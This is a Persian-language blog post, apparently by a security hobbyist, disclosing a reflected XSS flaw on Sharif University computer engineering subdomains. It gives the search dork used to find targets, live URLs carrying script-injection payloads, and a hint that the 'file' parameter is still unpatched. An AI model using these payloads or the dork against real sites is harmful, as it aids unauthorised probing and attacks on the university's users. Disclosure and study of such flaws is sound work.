ویدیو آسیب پذیری xss دانشگاه صنعتی شریف

 

با سلام خدمت تمامی کاربران عزیز سایت mr-msa.xyz

در این پست براتون ویدئوی باگ Cross Site Scripting (XSS) از ساب دامنه سایت دانشگاه صنعتی شریف رو آماده کردم

که می‌تونید با کیفیت ۱۰۸۰ تماشا کنید.

آسیب پدیری از نوع Reflected هست.

 

«ویدئو در یوتیوب»

 

در کنار این بخش، بخش های دیگر هم این باگ رو دارن مثلا:

http://ce.sharif.ir/courses/83-84/2/ce254/index.php?section=%3Cscript%3Ealert(%27Mr-MSA.xyz%27)%3C/script%3E&file=read&id=5

مراحل کشف آسیب پذیری

تارگت ها: ce.sharif.ir ، ce.sharif.edu ، ce.sharif.ac.ir

با این دورک بخش های مختلف رو پیدا کردم.

site:*.sharif.ir inurl:id=

که این قسمت برام جالب بود:

http://ce.sharif.ir/courses/85-86/2/ce342/index.php?section=grades&file=grades&cmd=print&id=0

بجای بخش grades کد جاوااسکریپت خودم رو قرار دادم.

به این صورت:

http://ce.sharif.ir/courses/85-86/2/ce342/index.php?section=grades%3Cscript%3Ealert(%27salam%27)%3C/script%3E&file=grades&cmd=print&id=0

در حال حاضر بخش section که چاپ میشه بسته شده اما بخش file رو تغییر بدید هنوز آسیب پذیری هست.

لینک مفید :‌ https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

یادتون نره نظرتون رو حتما توی بخش نظرات بنویسید و کانال آپارات و یوتیوب رو سابسکرایب کنید که ویدئو های بعدی رو از دست ندید.

موفق و پیروز باشید.